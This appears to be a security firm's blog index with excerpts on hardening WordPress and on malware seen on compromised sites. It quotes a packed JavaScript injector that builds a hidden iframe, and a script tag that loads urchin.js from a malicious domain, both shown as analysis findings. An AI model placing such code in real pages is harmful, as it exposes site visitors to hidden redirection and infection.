This post was put together in collaboration with one of our Support Engineers, Bruno Borges. Be sure to take a minute and say thanks for the info, he loves twitter (when its up). It seems every day we’re combating malicious redirections. Often, they are simple, but everyday they are evolving, and in some instances become [...]
How To: Stop The Hacker By Hardening WordPress
June 19, 2012 by
Every day we service 100′s of clients and the question is always asked: How do you stop these hackers!!!” Unfortunately, it’s perhaps the hardest to explain and understand for most. That being said, this post will be one of a series that talks to what end-users can do to help reduce their threat landscape. This [...]
How to stop the hacker
April 23, 2012 by
How to stop the hacker? This is a very common question we get daily. “My site got hacked, how can I stop the hacker from attacking me again?” Stopping the hacker You can’t really stop the hacker from trying to attack your site, but you can stop him from succeeding on his attempts. Specially [...]
New Malware – eval(function(p,a,c,k,e,d)
November 4, 2011 by
We are seeing many WordPress sites on shared hosts getting compromised with an encoded javascript malware (using Dean Edwards packer). This is what is gets added to the hacked sites: <script>eval(function(p,a,c,k,e,d){e=function(c) {return(c<a?”:e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))}; if(!”.replace(/^/,String)){while(c–){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}]; e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’ \b’,’g’),k[c])}}return p}(‘i 9(){a=6.h(‘b’);7(!a){5 0=6.j(‘k’);6.g.l(0); .. 9()",y)}’,41,41,’el||ua|indexOf|style|var|document|if|1px| MakeFrameEx|element|yahoo_api|height| width|display|none|body|getElementById|function|createElement| iframe|appendChild|src|id|c0m|msie| toLowerCase|opera|webtv||setTimeout|windows|http|userAgent| 1000|hdghdg|navigator|li|showthread|php| 72241732′.split(‘|’),0,{})) And that code (once decoded by the browser) is used to [...]
SQL injections: nbnjkl.com/urchin.js and jjghui.com/urchin.js
October 13, 2011 by
We are seeing many sites compromised with malware from jjghui.com/urchin.js (and now nbnjkl.com/urchin.js). Most of them are IIS/ASP sites and the infection method seems to be similar to the Lizamoon mass infections from a few months ago (SQL injection). This is how it shows on a hacked site: <script src= http://nbnjkl.com/urchin.js ></script> We posted full details [...]
Malware updates: Aug 2011 – .htaccess to .ru and osa.pl, iframes to .cc and .il
September 13, 2011 by
We are often asked what were the top domains distributing malware or what threats we see more often on our security scanner. For the month of August, things were very similar to the previous ones, with a slightly increase in the number of WordPress sites compromised due to the Timthumb.php vulnerability. If your site [...]
